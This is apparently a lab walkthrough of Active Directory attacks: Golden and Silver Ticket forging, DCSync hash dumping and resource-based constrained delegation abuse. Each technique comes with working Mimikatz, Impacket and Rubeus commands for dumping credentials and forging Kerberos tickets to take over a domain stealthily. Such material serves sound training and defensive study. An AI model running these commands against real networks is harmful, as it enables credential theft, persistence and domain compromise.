Active Directory Attack Lab Walkthrough – Part 2: Golden Tickets, Silver Tickets, DCSync, and RBCD
This guide builds on Part 1 and walks you through more advanced, high-impact techniques in Active Directory exploitation. These are techniques used to maintain persistence, move laterally with stealth, and access sensitive data without triggering typical defenses.
Golden Ticket Attack
Goal: Forge a TGT (Ticket Granting Ticket) to impersonate any user in the domain, including domain admins.
What You Need:
- The NTLM hash of the
krbtgtaccount (can be dumped via Mimikatz or DCSync) - The domain name
- The SID of the domain
Steps:
- Dump the krbtgt hash:
lsadump::lsa /inject /name:krbtgt
- Build a golden ticket with Mimikatz:
kerberos::golden /user:Administrator /domain:security.local /sid:S-1-5-21-XXXX /krbtgt:<krbtgt_hash> /id:500 /ptt
- Confirm ticket injection:
kerberos::list
- Use the ticket to access privileged resources:
dir \\dc.security.local\C$
Silver Ticket Attack
Goal: Forge a TGS (Ticket Granting Service) to access a specific service on a specific machine without contacting the DC.
What You Need:
- The NTLM hash of the service account
- SPN for the service
- FQDN and hostname of the target server
Steps:
- Get SPNs for service accounts:
Get-DomainUser -SPN
- Use Mimikatz to create a silver ticket:
kerberos::golden /user:svc-account /domain:security.local /sid:S-1-5-21-XXXX /rc4:<NTLM_hash> /service:cifs /target:server.security.local /ptt
- Verify ticket:
kerberos::list
- Use access:
dir \\server.security.local\C$
DCSync Attack
Goal: Simulate domain replication to dump password hashes for any user in the domain.
What You Need:
- Membership in a group with replication rights (Domain Admin, Enterprise Admin, or equivalent ACL rights)
Steps (Mimikatz):
lsadump::dcsync /domain:security.local /user:krbtgt
lsadump::dcsync /domain:security.local /user:Administrator
Steps (Impacket secretsdump):
secretsdump.py SECURITY.LOCAL/Administrator:'Password'@dc.security.local
Resource-Based Constrained Delegation (RBCD)
Goal: Configure a computer account to impersonate users to a service (e.g., domain controller) by abusing delegation settings.
What You Need:
- Low-privileged access
- The ability to create or control a computer account (AddComputer.py or similar)
GenericWriteorWriteOwnerrights over the target machine account
Steps:
- Add a new computer account:
python3 addcomputer.py -dc-ip 10.0.0.1 -computer-name CLIENT01$ -computer-pass 'Password123!' -domain security.local -u user -p userpass
- Set RBCD permissions using Set-ADComputer or Powermad:
Set-ADComputer -Identity TARGETSERVER$ -PrincipalsAllowedToDelegateToAccount CLIENT01$
- Forge a ticket with S4U2Self + S4U2Proxy:
Rubeus.exe s4u /user:CLIENT01$ /rc4:<ntlm_hash> /impersonateuser:Administrator /msdsspn:cifs/dc.security.local /domain:security.local /ptt
- Use ticket:
dir \\dc.security.local\C$
Each of these techniques allows for stealthy lateral movement or full domain compromise, often without triggering typical alerts. They are essential skills for advanced Active Directory exploitation.